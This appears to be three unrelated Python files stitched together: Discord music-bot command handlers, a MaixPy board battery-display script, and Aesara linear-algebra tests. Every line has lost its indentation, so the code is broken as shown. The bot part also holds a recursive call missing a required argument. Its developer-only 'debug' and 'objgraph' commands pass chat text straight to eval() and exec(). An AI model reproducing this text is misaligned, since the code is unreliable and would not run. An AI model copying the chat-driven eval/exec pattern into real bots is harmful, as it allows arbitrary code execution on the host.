async def cmd_clean(self, message, channel, guild, author, search_range=50):
"""
Usage:
{command_prefix}clean [range]
Removes up to [range] messages the bot has posted in chat. Default: 50, Max: 1000
"""
try:
float(search_range) # lazy check
search_range = min(int(search_range), 1000)
except:
return Response(
self.str.get(
"cmd-clean-invalid",
"Invalid parameter. Please provide a number of messages to search.",
),
reply=True,
delete_after=8,
)
await self.safe_delete_message(message, quiet=True)
def is_possible_command_invoke(entry):
valid_call = any(
entry.content.startswith(prefix)
for prefix in [self.config.command_prefix]
) # can be expanded
return valid_call and not entry.content[1:2].isspace()
delete_invokes = True
delete_all = (
channel.permissions_for(author).manage_messages
or self.config.owner_id == author.id
)
def check(message):
if is_possible_command_invoke(message) and delete_invokes:
return delete_all or message.author == author
return message.author == self.user
if self.user.bot:
if channel.permissions_for(guild.me).manage_messages:
deleted = await channel.purge(
check=check, limit=search_range, before=message
)
return Response(
self.str.get(
"cmd-clean-reply", "Cleaned up {0} message{1}."
).format(len(deleted), "s" * bool(deleted)),
delete_after=15,
)
async def cmd_pldump(self, channel, author, song_url):
"""
Usage:
{command_prefix}pldump url
Dumps the individual urls of a playlist
"""
try:
info = await self.downloader.extract_info(
self.loop, song_url.strip("<>"), download=False, process=False
)
except Exception as e:
raise exceptions.CommandError(
"Could not extract info from input url\n%s\n" % e, expire_in=25
)
if not info:
raise exceptions.CommandError(
"Could not extract info from input url, no data.", expire_in=25
)
if not info.get("entries", None):
# TODO: Retarded playlist checking
# set(url, webpageurl).difference(set(url))
if info.get("url", None) != info.get("webpage_url", info.get("url", None)):
raise exceptions.CommandError(
"This does not seem to be a playlist.", expire_in=25
)
else:
return await self.cmd_pldump(channel, info.get(""))
linegens = defaultdict(
lambda: None,
**{
"youtube": lambda d: "https://www.youtube.com/watch?v=%s" % d["id"],
"soundcloud": lambda d: d["url"],
"bandcamp": lambda d: d["url"],
}
)
exfunc = linegens[info["extractor"].split(":")[0]]
if not exfunc:
raise exceptions.CommandError(
"Could not extract info from input url, unsupported playlist type.",
expire_in=25,
)
with BytesIO() as fcontent:
for item in info["entries"]:
fcontent.write(exfunc(item).encode("utf8") + b"\n")
fcontent.seek(0)
await author.send(
"Here's the playlist dump for <%s>" % song_url,
file=discord.File(fcontent, filename="playlist.txt"),
)
return Response("Sent a message with a playlist file.", delete_after=20)
async def cmd_listids(self, guild, author, leftover_args, cat="all"):
"""
Usage:
{command_prefix}listids [categories]
Lists the ids for various things. Categories are:
all, users, roles, channels
"""
cats = ["channels", "roles", "users"]
if cat not in cats and cat != "all":
return Response(
"Valid categories: " + " ".join(["`%s`" % c for c in cats]),
reply=True,
delete_after=25,
)
if cat == "all":
requested_cats = cats
else:
requested_cats = [cat] + [c.strip(",") for c in leftover_args]
data = ["Your ID: %s" % author.id]
for cur_cat in requested_cats:
rawudata = None
if cur_cat == "users":
data.append("\nUser IDs:")
rawudata = [
"%s #%s: %s" % (m.name, m.discriminator, m.id)
for m in guild.members
]
elif cur_cat == "roles":
data.append("\nRole IDs:")
rawudata = ["%s: %s" % (r.name, r.id) for r in guild.roles]
elif cur_cat == "channels":
data.append("\nText Channel IDs:")
tchans = [
c for c in guild.channels if isinstance(c, discord.TextChannel)
]
rawudata = ["%s: %s" % (c.name, c.id) for c in tchans]
rawudata.append("\nVoice Channel IDs:")
vchans = [
c for c in guild.channels if isinstance(c, discord.VoiceChannel)
]
rawudata.extend("%s: %s" % (c.name, c.id) for c in vchans)
if rawudata:
data.extend(rawudata)
with BytesIO() as sdata:
sdata.writelines(d.encode("utf8") + b"\n" for d in data)
sdata.seek(0)
# TODO: Fix naming (Discord20API-ids.txt)
await author.send(
file=discord.File(
sdata,
filename="%s-ids-%s.txt" % (guild.name.replace(" ", "_"), cat),
)
)
return Response("Sent a message with a list of IDs.", delete_after=20)
async def cmd_perms(
self, author, user_mentions, channel, guild, message, permissions, target=None
):
"""
Usage:
{command_prefix}perms [@user]
Sends the user a list of their permissions, or the permissions of the user specified.
"""
if user_mentions:
user = user_mentions[0]
if not user_mentions and not target:
user = author
if not user_mentions and target:
user = guild.get_member_named(target)
if user == None:
try:
user = await self.fetch_user(target)
except discord.NotFound:
return Response(
"Invalid user ID or server nickname, please double check all typing and try again.",
reply=False,
delete_after=30,
)
permissions = self.permissions.for_user(user)
if user == author:
lines = ["Command permissions in %s\n" % guild.name, "```", "```"]
else:
lines = [
"Command permissions for {} in {}\n".format(user.name, guild.name),
"```",
"```",
]
for perm in permissions.__dict__:
if perm in ["user_list"] or permissions.__dict__[perm] == set():
continue
lines.insert(len(lines) - 1, "%s: %s" % (perm, permissions.__dict__[perm]))
await self.safe_send_message(author, "\n".join(lines))
return Response("\N{OPEN MAILBOX WITH RAISED FLAG}", delete_after=20)
@owner_only
async def cmd_setname(self, leftover_args, name):
"""
Usage:
{command_prefix}setname name
Changes the bot's username.
Note: This operation is limited by discord to twice per hour.
"""
name = " ".join([name, *leftover_args])
try:
await self.user.edit(username=name)
except discord.HTTPException:
raise exceptions.CommandError(
"Failed to change name. Did you change names too many times? "
"Remember name changes are limited to twice per hour."
)
except Exception as e:
raise exceptions.CommandError(e, expire_in=20)
return Response(
"Set the bot's username to **{0}**".format(name), delete_after=20
)
async def cmd_setnick(self, guild, channel, leftover_args, nick):
"""
Usage:
{command_prefix}setnick nick
Changes the bot's nickname.
"""
if not channel.permissions_for(guild.me).change_nickname:
raise exceptions.CommandError("Unable to change nickname: no permission.")
nick = " ".join([nick, *leftover_args])
try:
await guild.me.edit(nick=nick)
except Exception as e:
raise exceptions.CommandError(e, expire_in=20)
return Response("Set the bot's nickname to `{0}`".format(nick), delete_after=20)
@owner_only
async def cmd_setavatar(self, message, url=None):
"""
Usage:
{command_prefix}setavatar [url]
Changes the bot's avatar.
Attaching a file and leaving the url parameter blank also works.
"""
if message.attachments:
thing = message.attachments[0].url
elif url:
thing = url.strip("<>")
else:
raise exceptions.CommandError(
"You must provide a URL or attach a file.", expire_in=20
)
try:
timeout = aiohttp.ClientTimeout(total=10)
async with self.aiosession.get(thing, timeout=timeout) as res:
await self.user.edit(avatar=await res.read())
except Exception as e:
raise exceptions.CommandError(
"Unable to change avatar: {}".format(e), expire_in=20
)
return Response("Changed the bot's avatar.", delete_after=20)
async def cmd_disconnect(self, guild):
"""
Usage:
{command_prefix}disconnect
Forces the bot leave the current voice channel.
"""
await self.disconnect_voice_client(guild)
return Response("Disconnected from `{0.name}`".format(guild), delete_after=20)
async def cmd_restart(self, channel):
"""
Usage:
{command_prefix}restart
Restarts the bot.
Will not properly load new dependencies or file updates unless fully shutdown
and restarted.
"""
await self.safe_send_message(
channel,
"\N{WAVING HAND SIGN} Restarting. If you have updated your bot "
"or its dependencies, you need to restart the bot properly, rather than using this command.",
)
player = self.get_player_in(channel.guild)
if player and player.is_paused:
player.resume()
await self.disconnect_all_voice_clients()
raise exceptions.RestartSignal()
async def cmd_shutdown(self, channel):
"""
Usage:
{command_prefix}shutdown
Disconnects from voice channels and closes the bot process.
"""
await self.safe_send_message(channel, "\N{WAVING HAND SIGN}")
player = self.get_player_in(channel.guild)
if player and player.is_paused:
player.resume()
await self.disconnect_all_voice_clients()
raise exceptions.TerminateSignal()
async def cmd_leaveserver(self, val, leftover_args):
"""
Usage:
{command_prefix}leaveserver <name/ID>
Forces the bot to leave a server.
When providing names, names are case-sensitive.
"""
if leftover_args:
val = " ".join([val, *leftover_args])
t = self.get_guild(val)
if t is None:
t = discord.utils.get(self.guilds, name=val)
if t is None:
raise exceptions.CommandError(
"No guild was found with the ID or name as `{0}`".format(val)
)
await t.leave()
return Response(
"Left the guild: `{0.name}` (Owner: `{0.owner.name}`, ID: `{0.id}`)".format(
t
)
)
@dev_only
async def cmd_breakpoint(self, message):
log.critical("Activating debug breakpoint")
return
@dev_only
async def cmd_objgraph(self, channel, func="most_common_types()"):
import objgraph
await self.send_typing(channel)
if func == "growth":
f = StringIO()
objgraph.show_growth(limit=10, file=f)
f.seek(0)
data = f.read()
f.close()
elif func == "leaks":
f = StringIO()
objgraph.show_most_common_types(
objects=objgraph.get_leaking_objects(), file=f
)
f.seek(0)
data = f.read()
f.close()
elif func == "leakstats":
data = objgraph.typestats(objects=objgraph.get_leaking_objects())
else:
data = eval("objgraph." + func)
return Response(data, codeblock="py")
@dev_only
async def cmd_debug(self, message, _player, *, data):
codeblock = "```py\n{}\n```"
result = None
if data.startswith("```") and data.endswith("```"):
data = "\n".join(data.rstrip("`\n").split("\n")[1:])
code = data.strip("` \n")
scope = globals().copy()
scope.update({"self": self})
try:
result = eval(code, scope)
except:
try:
exec(code, scope)
except Exception as e:
traceback.print_exc(chain=False)
return Response("{}: {}".format(type(e).__name__, e))
if asyncio.iscoroutine(result):
result = await result
return Response(codeblock.format(result))
async def on_message(self, message):
await self.wait_until_ready()
message_content = message.content.strip()
if not message_content.startswith(self.config.command_prefix):
return
if message.author == self.user:
log.warning("Ignoring command from myself ({})".format(message.content))
return
if (
message.author.bot
and message.author.id not in self.config.bot_exception_ids
):
log.warning("Ignoring command from other bot ({})".format(message.content))
return
if (not isinstance(message.channel, discord.abc.GuildChannel)) and (
not isinstance(message.channel, discord.abc.PrivateChannel)
):
return
command, *args = message_content.split(
" "
) # Uh, doesn't this break prefixes with spaces in them (it doesn't, config parser already breaks them)
command = command[len(self.config.command_prefix) :].lower().strip()
# [] produce [''] which is not what we want (it break things)
if args:
args = " ".join(args).lstrip(" ").split(" ")
else:
args = []
handler = getattr(self, "cmd_" + command, None)
if not handler:
# alias handler
if self.config.usealias:
command = self.aliases.get(command)
handler = getattr(self, "cmd_" + command, None)
if not handler:
return
else:
return
if isinstance(message.channel, discord.abc.PrivateChannel):
if not (
message.author.id == self.config.owner_id and command == "joinserver"
):
await self.safe_send_message(
message.channel, "You cannot use this bot in private messages."
)
return
if (
self.config.bound_channels
and message.channel.id not in self.config.bound_channels
):
if self.config.unbound_servers:
for channel in message.guild.channels:
if channel.id in self.config.bound_channels:
return
else:
return # if I want to log this I just move it under the prefix check
if (
message.author.id in self.blacklist
and message.author.id != self.config.owner_id
):
log.warning(
"User blacklisted: {0.id}/{0!s} ({1})".format(message.author, command)
)
return
else:
log.info(
"{0.id}/{0!s}: {1}".format(
message.author, message_content.replace("\n", "\n... ")
)
)
user_permissions = self.permissions.for_user(message.author)
argspec = inspect.signature(handler)
params = argspec.parameters.copy()
sentmsg = response = None
# noinspection PyBroadException
try:
if (
user_permissions.ignore_non_voice
and command in user_permissions.ignore_non_voice
):
await self._check_ignore_non_voice(message)
handler_kwargs = {}
if params.pop("message", None):
handler_kwargs["message"] = message
if params.pop("channel", None):
handler_kwargs["channel"] = message.channel
if params.pop("author", None):
handler_kwargs["author"] = message.author
if params.pop("guild", None):
handler_kwargs["guild"] = message.guild
if params.pop("player", None):
handler_kwargs["player"] = await self.get_player(message.channel)
if params.pop("_player", None):
handler_kwargs["_player"] = self.get_player_in(message.guild)
if params.pop("permissions", None):
handler_kwargs["permissions"] = user_permissions
if params.pop("user_mentions", None):
handler_kwargs["user_mentions"] = list(
map(message.guild.get_member, message.raw_mentions)
)
if params.pop("channel_mentions", None):
handler_kwargs["channel_mentions"] = list(
map(message.guild.get_channel, message.raw_channel_mentions)
)
if params.pop("voice_channel", None):
handler_kwargs["voice_channel"] = (
message.guild.me.voice.channel if message.guild.me.voice else None
)
if params.pop("leftover_args", None):
handler_kwargs["leftover_args"] = args
args_expected = []
for key, param in list(params.items()):
# parse (*args) as a list of args
if param.kind == param.VAR_POSITIONAL:
handler_kwargs[key] = args
params.pop(key)
continue
# parse (*, args) as args rejoined as a string
# multiple of these arguments will have the same value
if param.kind == param.KEYWORD_ONLY and param.default == param.empty:
handler_kwargs[key] = " ".join(args)
params.pop(key)
continue
doc_key = (
"[{}={}]".format(key, param.default)
if param.default is not param.empty
else key
)
args_expected.append(doc_key)
# Ignore keyword args with default values when the command had no arguments
if not args and param.default is not param.empty:
params.pop(key)
continue
# Assign given values to positional arguments
if args:
arg_value = args.pop(0)
handler_kwargs[key] = arg_value
params.pop(key)
if message.author.id != self.config.owner_id:
if (
user_permissions.command_whitelist
and command not in user_permissions.command_whitelist
):
raise exceptions.PermissionsError(
"This command is not enabled for your group ({}).".format(
user_permissions.name
),
expire_in=20,
)
elif (
user_permissions.command_blacklist
and command in user_permissions.command_blacklist
):
raise exceptions.PermissionsError(
"This command is disabled for your group ({}).".format(
user_permissions.name
),
expire_in=20,
)
# Invalid usage, return docstring
if params:
docs = getattr(handler, "__doc__", None)
if not docs:
docs = "Usage: {}{} {}".format(
self.config.command_prefix, command, " ".join(args_expected)
)
docs = dedent(docs)
await self.safe_send_message(
message.channel,
"```\n{}\n```".format(
docs.format(command_prefix=self.config.command_prefix)
),
expire_in=60,
)
return
response = await handler(**handler_kwargs)
if response and isinstance(response, Response):
if (
not isinstance(response.content, discord.Embed)
and self.config.embeds
):
content = self._gen_embed()
content.title = command
content.description = response.content
else:
content = response.content
if response.reply:
if isinstance(content, discord.Embed):
content.description = "{} {}".format(
message.author.mention,
content.description
if content.description is not discord.Embed.Empty
else "",
)
else:
content = "{}: {}".format(message.author.mention, content)
sentmsg = await self.safe_send_message(
message.channel,
content,
expire_in=response.delete_after
if self.config.delete_messages
else 0,
also_delete=message if self.config.delete_invoking else None,
)
except (
exceptions.CommandError,
exceptions.HelpfulError,
exceptions.ExtractionError,
) as e:
log.error(
"Error in {0}: {1.__class__.__name__}: {1.message}".format(command, e),
exc_info=True,
)
expirein = e.expire_in if self.config.delete_messages else None
alsodelete = message if self.config.delete_invoking else None
if self.config.embeds:
content = self._gen_embed()
content.add_field(name="Error", value=e.message, inline=False)
content.colour = 13369344
else:
content = "```\n{}\n```".format(e.message)
await self.safe_send_message(
message.channel, content, expire_in=expirein, also_delete=alsodelete
)
except exceptions.Signal:
raise
except Exception:
log.error("Exception in on_message", exc_info=True)
if self.config.debug_mode:
await self.safe_send_message(
message.channel, "```\n{}\n```".format(traceback.format_exc())
)
finally:
if not sentmsg and not response and self.config.delete_invoking:
await asyncio.sleep(5)
await self.safe_delete_message(message, quiet=True)
async def gen_cmd_list(self, message, list_all_cmds=False):
for att in dir(self):
# This will always return at least cmd_help, since they needed perms to run this command
if att.startswith("cmd_") and not hasattr(getattr(self, att), "dev_cmd"):
user_permissions = self.permissions.for_user(message.author)
command_name = att.replace("cmd_", "").lower()
whitelist = user_permissions.command_whitelist
blacklist = user_permissions.command_blacklist
if list_all_cmds:
self.commands.append(
"{}{}".format(self.config.command_prefix, command_name)
)
elif blacklist and command_name in blacklist:
pass
elif whitelist and command_name not in whitelist:
pass
else:
self.commands.append(
"{}{}".format(self.config.command_prefix, command_name)
)
async def on_voice_state_update(self, member, before, after):
if not self.init_ok:
return # Ignore stuff before ready
if before.channel:
channel = before.channel
elif after.channel:
channel = after.channel
else:
return
if (
member == self.user and not after.channel
): # if bot was disconnected from channel
await self.disconnect_voice_client(before.channel.guild)
return
if not self.config.auto_pause:
return
autopause_msg = "{state} in {channel.guild.name}/{channel.name} {reason}"
auto_paused = self.server_specific_data[channel.guild]["auto_paused"]
try:
player = await self.get_player(channel)
except exceptions.CommandError:
return
def is_active(member):
if not member.voice:
return False
if any([member.voice.deaf, member.voice.self_deaf, member.bot]):
return False
return True
if not member == self.user and is_active(member): # if the user is not inactive
if (
player.voice_client.channel != before.channel
and player.voice_client.channel == after.channel
): # if the person joined
if auto_paused and player.is_paused:
log.info(
autopause_msg.format(
state="Unpausing",
channel=player.voice_client.channel,
reason="",
).strip()
)
self.server_specific_data[player.voice_client.guild][
"auto_paused"
] = False
player.resume()
elif (
player.voice_client.channel == before.channel
and player.voice_client.channel != after.channel
):
if not any(
is_active(m) for m in player.voice_client.channel.members
): # channel is empty
if not auto_paused and player.is_playing:
log.info(
autopause_msg.format(
state="Pausing",
channel=player.voice_client.channel,
reason="(empty channel)",
).strip()
)
self.server_specific_data[player.voice_client.guild][
"auto_paused"
] = True
player.pause()
elif (
player.voice_client.channel == before.channel
and player.voice_client.channel == after.channel
): # if the person undeafen
if auto_paused and player.is_paused:
log.info(
autopause_msg.format(
state="Unpausing",
channel=player.voice_client.channel,
reason="(member undeafen)",
).strip()
)
self.server_specific_data[player.voice_client.guild][
"auto_paused"
] = False
player.resume()
else:
if any(
is_active(m) for m in player.voice_client.channel.members
): # channel is not empty
if auto_paused and player.is_paused:
log.info(
autopause_msg.format(
state="Unpausing",
channel=player.voice_client.channel,
reason="",
).strip()
)
self.server_specific_data[player.voice_client.guild][
"auto_paused"
] = False
player.resume()
else:
if not auto_paused and player.is_playing:
log.info(
autopause_msg.format(
state="Pausing",
channel=player.voice_client.channel,
reason="(empty channel or member deafened)",
).strip()
)
self.server_specific_data[player.voice_client.guild][
"auto_paused"
] = True
player.pause()
async def on_guild_update(self, before: discord.Guild, after: discord.Guild):
if before.region != after.region:
log.warning(
'Guild "%s" changed regions: %s -> %s'
% (after.name, before.region, after.region)
)
async def on_guild_join(self, guild: discord.Guild):
log.info("Bot has been added to guild: {}".format(guild.name))
owner = self._get_owner(voice=True) or self._get_owner()
if self.config.leavenonowners:
check = guild.get_member(owner.id)
if check == None:
await guild.leave()
log.info("Left {} due to bot owner not found.".format(guild.name))
await owner.send(
self.str.get(
"left-no-owner-guilds",
"Left `{}` due to bot owner not being found in it.".format(
guild.name
),
)
)
log.debug("Creating data folder for guild %s", guild.id)
pathlib.Path("data/%s/" % guild.id).mkdir(exist_ok=True)
async def on_guild_remove(self, guild: discord.Guild):
log.info("Bot has been removed from guild: {}".format(guild.name))
log.debug("Updated guild list:")
[log.debug(" - " + s.name) for s in self.guilds]
if guild.id in self.players:
self.players.pop(guild.id).kill()
async def on_guild_available(self, guild: discord.Guild):
if not self.init_ok:
return # Ignore pre-ready events
log.debug('Guild "{}" has become available.'.format(guild.name))
player = self.get_player_in(guild)
if player and player.is_paused:
av_paused = self.server_specific_data[guild]["availability_paused"]
if av_paused:
log.debug(
'Resuming player in "{}" due to availability.'.format(guild.name)
)
self.server_specific_data[guild]["availability_paused"] = False
player.resume()
async def on_guild_unavailable(self, guild: discord.Guild):
log.debug('Guild "{}" has become unavailable.'.format(guild.name))
player = self.get_player_in(guild)
if player and player.is_playing:
log.debug(
'Pausing player in "{}" due to unavailability.'.format(guild.name)
)
self.server_specific_data[guild]["availability_paused"] = True
player.pause()
def voice_client_in(self, guild):
for vc in self.voice_clients:
if vc.guild == guild:
return vc
return None
|
the-stack_0_6594 | import lcd
import utime
import sys
import pmu
from Maix import GPIO
from fpioa_manager import *
def display_hold(button):
hold_status = False
print(button.value())
if ((button.value() == 0)):
hold_status = True
while(hold_status):
lcd.draw_string(0, 119, "Hold!", lcd.RED, lcd.BLACK)
utime.sleep(1);
lcd.draw_string(0, 119, "Hold!", lcd.BLACK, lcd.RED)
utime.sleep(1);
if (button.value() == 0):
lcd.draw_string(0, 119, " ", lcd.RED, lcd.BLACK)
hold_status = False
break
def button_function(button, y):
lcd.draw_string(0, y, "function" + str(button.value()), lcd.BLUE, lcd.BLACK)
return
filler = " "
axp = pmu.axp192()
axp.enableADCs(True)
lcd.init()
lcd.draw_string(0, 0, "Battery Info Develop", lcd.WHITE, lcd.BLACK)
lcd.draw_string(230, 0, "*", lcd.BLUE, lcd.BLACK)
# init button
fm.register(board_info.BUTTON_A, fm.fpioa.GPIO1)
fm.register(board_info.BUTTON_B, fm.fpioa.GPIO2)
button_a = GPIO(GPIO.GPIO1, GPIO.IN, GPIO.PULL_UP) #PULL_UP is required here!
button_b = GPIO(GPIO.GPIO2, GPIO.IN, GPIO.PULL_UP) #PULL_UP is required here!
try:
while(True):
val = axp.getVbatVoltage()
lcd.draw_string(0, 15, "Battery Voltage:" + str(val) + filler, lcd.RED, lcd.BLACK)
val = axp.getUSBVoltage()
lcd.draw_string(0, 30, "USB Voltage:" + str(val) + filler, lcd.WHITE, lcd.BLACK)
val = axp.getUSBInputCurrent()
lcd.draw_string(0, 45, "USB InputCurrent:" + str(val) + filler, lcd.RED, lcd.BLACK)
val = axp.getBatteryDischargeCurrent()
lcd.draw_string(0, 60, "DischargeCurrent:" + str(val) + filler, lcd.GREEN, lcd.BLACK)
val = axp.getBatteryInstantWatts()
lcd.draw_string(0, 75, "Instant Watts:" + str(val) + filler, lcd.BLUE, lcd.BLACK)
val = axp.getTemperature()
lcd.draw_string(0, 90, "Temperature:" + str(val) + filler, lcd.BLUE, lcd.BLACK)
lcd.draw_string(80, 105, "Press Button B:Hold", lcd.RED, lcd.BLACK)
lcd.draw_string(80, 119, "Press Button A:Exit", lcd.RED, lcd.BLACK)
display_hold(button_b)
if (button_a.value() == 0):
break
utime.sleep(1)
except Exception as e:
sys.print_exception(e)
finally:
lcd.draw_string(230, 0, " ", lcd.BLUE, lcd.BLACK)
print("Finished")
sys.exit()
|
the-stack_0_6597 | import numpy as np
import numpy.linalg
import pytest
from numpy import inf
from numpy.testing import assert_array_almost_equal
import aesara
from aesara import function
from aesara.configdefaults import config
from aesara.tensor.math import _allclose
from aesara.tensor.nlinalg import (
SVD,
Eig,
MatrixInverse,
TensorInv,
det,
eig,
eigh,
matrix_dot,
matrix_inverse,
matrix_power,
norm,
pinv,
qr,
svd,
tensorinv,
tensorsolve,
trace,
)
from aesara.tensor.type import (
lmatrix,
lscalar,
matrix,
scalar,
tensor3,
tensor4,
vector,
)
from tests import unittest_tools as utt
def test_pseudoinverse_correctness():
rng = np.random.RandomState(utt.fetch_seed())
d1 = rng.randint(4) + 2
d2 = rng.randint(4) + 2
r = rng.randn(d1, d2).astype(config.floatX)
x = matrix()
xi = pinv(x)
ri = function([x], xi)(r)
assert ri.shape[0] == r.shape[1]
assert ri.shape[1] == r.shape[0]
assert ri.dtype == r.dtype
# Note that pseudoinverse can be quite unprecise so I prefer to compare
# the result with what np.linalg returns
assert _allclose(ri, np.linalg.pinv(r))
def test_pseudoinverse_grad():
rng = np.random.RandomState(utt.fetch_seed())
d1 = rng.randint(4) + 2
d2 = rng.randint(4) + 2
r = rng.randn(d1, d2).astype(config.floatX)
utt.verify_grad(pinv, [r])
class TestMatrixInverse(utt.InferShapeTester):
def setup_method(self):
super().setup_method()
self.op_class = MatrixInverse
self.op = matrix_inverse
self.rng = np.random.RandomState(utt.fetch_seed())
def test_inverse_correctness(self):
r = self.rng.randn(4, 4).astype(config.floatX)
x = matrix()
xi = self.op(x)
ri = function([x], xi)(r)
assert ri.shape == r.shape
assert ri.dtype == r.dtype
rir = np.dot(ri, r)
rri = np.dot(r, ri)
assert _allclose(np.identity(4), rir), rir
assert _allclose(np.identity(4), rri), rri
def test_infer_shape(self):
r = self.rng.randn(4, 4).astype(config.floatX)
x = matrix()
xi = self.op(x)
self._compile_and_check([x], [xi], [r], self.op_class, warn=False)
def test_matrix_dot():
rng = np.random.RandomState(utt.fetch_seed())
n = rng.randint(4) + 2
rs = []
xs = []
for k in range(n):
rs += [rng.randn(4, 4).astype(config.floatX)]
xs += [matrix()]
sol = matrix_dot(*xs)
aesara_sol = function(xs, sol)(*rs)
numpy_sol = rs[0]
for r in rs[1:]:
numpy_sol = np.dot(numpy_sol, r)
assert _allclose(numpy_sol, aesara_sol)
def test_qr_modes():
rng = np.random.RandomState(utt.fetch_seed())
A = matrix("A", dtype=config.floatX)
a = rng.rand(4, 4).astype(config.floatX)
f = function([A], qr(A))
t_qr = f(a)
n_qr = np.linalg.qr(a)
assert _allclose(n_qr, t_qr)
for mode in ["reduced", "r", "raw"]:
f = function([A], qr(A, mode))
t_qr = f(a)
n_qr = np.linalg.qr(a, mode)
if isinstance(n_qr, (list, tuple)):
assert _allclose(n_qr[0], t_qr[0])
assert _allclose(n_qr[1], t_qr[1])
else:
assert _allclose(n_qr, t_qr)
try:
n_qr = np.linalg.qr(a, "complete")
f = function([A], qr(A, "complete"))
t_qr = f(a)
assert _allclose(n_qr, t_qr)
except TypeError as e:
assert "name 'complete' is not defined" in str(e)
class TestSvd(utt.InferShapeTester):
op_class = SVD
dtype = "float32"
def setup_method(self):
super().setup_method()
self.rng = np.random.RandomState(utt.fetch_seed())
self.A = matrix(dtype=self.dtype)
self.op = svd
def test_svd(self):
A = matrix("A", dtype=self.dtype)
U, S, VT = svd(A)
fn = function([A], [U, S, VT])
a = self.rng.rand(4, 4).astype(self.dtype)
n_u, n_s, n_vt = np.linalg.svd(a)
t_u, t_s, t_vt = fn(a)
assert _allclose(n_u, t_u)
assert _allclose(n_s, t_s)
assert _allclose(n_vt, t_vt)
fn = function([A], svd(A, compute_uv=False))
t_s = fn(a)
assert _allclose(n_s, t_s)
def test_svd_infer_shape(self):
self.validate_shape((4, 4), full_matrices=True, compute_uv=True)
self.validate_shape((4, 4), full_matrices=False, compute_uv=True)
self.validate_shape((2, 4), full_matrices=False, compute_uv=True)
self.validate_shape((4, 2), full_matrices=False, compute_uv=True)
self.validate_shape((4, 4), compute_uv=False)
def validate_shape(self, shape, compute_uv=True, full_matrices=True):
A = self.A
A_v = self.rng.rand(*shape).astype(self.dtype)
outputs = self.op(A, full_matrices=full_matrices, compute_uv=compute_uv)
if not compute_uv:
outputs = [outputs]
self._compile_and_check([A], outputs, [A_v], self.op_class, warn=False)
def test_tensorsolve():
rng = np.random.RandomState(utt.fetch_seed())
A = tensor4("A", dtype=config.floatX)
B = matrix("B", dtype=config.floatX)
X = tensorsolve(A, B)
fn = function([A, B], [X])
# slightly modified example from np.linalg.tensorsolve docstring
a = np.eye(2 * 3 * 4).astype(config.floatX)
a.shape = (2 * 3, 4, 2, 3 * 4)
b = rng.rand(2 * 3, 4).astype(config.floatX)
n_x = np.linalg.tensorsolve(a, b)
t_x = fn(a, b)
assert _allclose(n_x, t_x)
# check the type upcast now
C = tensor4("C", dtype="float32")
D = matrix("D", dtype="float64")
Y = tensorsolve(C, D)
fn = function([C, D], [Y])
c = np.eye(2 * 3 * 4, dtype="float32")
c.shape = (2 * 3, 4, 2, 3 * 4)
d = rng.rand(2 * 3, 4).astype("float64")
n_y = np.linalg.tensorsolve(c, d)
t_y = fn(c, d)
assert _allclose(n_y, t_y)
assert n_y.dtype == Y.dtype
# check the type upcast now
E = tensor4("E", dtype="int32")
F = matrix("F", dtype="float64")
Z = tensorsolve(E, F)
fn = function([E, F], [Z])
e = np.eye(2 * 3 * 4, dtype="int32")
e.shape = (2 * 3, 4, 2, 3 * 4)
f = rng.rand(2 * 3, 4).astype("float64")
n_z = np.linalg.tensorsolve(e, f)
t_z = fn(e, f)
assert _allclose(n_z, t_z)
assert n_z.dtype == Z.dtype
def test_inverse_singular():
singular = np.array([[1, 0, 0]] + [[0, 1, 0]] * 2, dtype=config.floatX)
a = matrix()
f = function([a], matrix_inverse(a))
with pytest.raises(np.linalg.LinAlgError):
f(singular)
def test_inverse_grad():
rng = np.random.RandomState(utt.fetch_seed())
r = rng.randn(4, 4)
utt.verify_grad(matrix_inverse, [r], rng=np.random)
rng = np.random.RandomState(utt.fetch_seed())
r = rng.randn(4, 4)
utt.verify_grad(matrix_inverse, [r], rng=np.random)
def test_det():
rng = np.random.RandomState(utt.fetch_seed())
r = rng.randn(5, 5).astype(config.floatX)
x = matrix()
f = aesara.function([x], det(x))
assert np.allclose(np.linalg.det(r), f(r))
def test_det_grad():
rng = np.random.RandomState(utt.fetch_seed())
r = rng.randn(5, 5).astype(config.floatX)
utt.verify_grad(det, [r], rng=np.random)
def test_det_shape():
rng = np.random.RandomState(utt.fetch_seed())
r = rng.randn(5, 5).astype(config.floatX)
x = matrix()
f = aesara.function([x], det(x))
f_shape = aesara.function([x], det(x).shape)
assert np.all(f(r).shape == f_shape(r))
def test_trace():
rng = np.random.RandomState(utt.fetch_seed())
x = matrix()
g = trace(x)
f = aesara.function([x], g)
for shp in [(2, 3), (3, 2), (3, 3)]:
m = rng.rand(*shp).astype(config.floatX)
v = np.trace(m)
assert v == f(m)
xx = vector()
ok = False
try:
trace(xx)
except TypeError:
ok = True
except ValueError:
ok = True
assert ok
class TestEig(utt.InferShapeTester):
op_class = Eig
op = eig
dtype = "float64"
def setup_method(self):
super().setup_method()
self.rng = np.random.RandomState(utt.fetch_seed())
self.A = matrix(dtype=self.dtype)
self.X = np.asarray(self.rng.rand(5, 5), dtype=self.dtype)
self.S = self.X.dot(self.X.T)
def test_infer_shape(self):
A = self.A
S = self.S
self._compile_and_check(
[A], # aesara.function inputs
self.op(A), # aesara.function outputs
# S must be square
[S],
self.op_class,
warn=False,
)
def test_eval(self):
A = matrix(dtype=self.dtype)
assert [e.eval({A: [[1]]}) for e in self.op(A)] == [[1.0], [[1.0]]]
x = [[0, 1], [1, 0]]
w, v = [e.eval({A: x}) for e in self.op(A)]
assert_array_almost_equal(np.dot(x, v), w * v)
class TestEigh(TestEig):
op = staticmethod(eigh)
def test_uplo(self):
S = self.S
a = matrix(dtype=self.dtype)
wu, vu = [out.eval({a: S}) for out in self.op(a, "U")]
wl, vl = [out.eval({a: S}) for out in self.op(a, "L")]
assert_array_almost_equal(wu, wl)
assert_array_almost_equal(vu * np.sign(vu[0, :]), vl * np.sign(vl[0, :]))
def test_grad(self):
X = self.X
# We need to do the dot inside the graph because Eigh needs a
# matrix that is hermitian
utt.verify_grad(lambda x: self.op(x.dot(x.T))[0], [X], rng=self.rng)
utt.verify_grad(lambda x: self.op(x.dot(x.T))[1], [X], rng=self.rng)
utt.verify_grad(lambda x: self.op(x.dot(x.T), "U")[0], [X], rng=self.rng)
utt.verify_grad(lambda x: self.op(x.dot(x.T), "U")[1], [X], rng=self.rng)
class TestEighFloat32(TestEigh):
dtype = "float32"
def test_uplo(self):
super().test_uplo()
def test_grad(self):
super().test_grad()
class TestLstsq:
def test_correct_solution(self):
x = lmatrix()
y = lmatrix()
z = lscalar()
b = aesara.tensor.nlinalg.lstsq()(x, y, z)
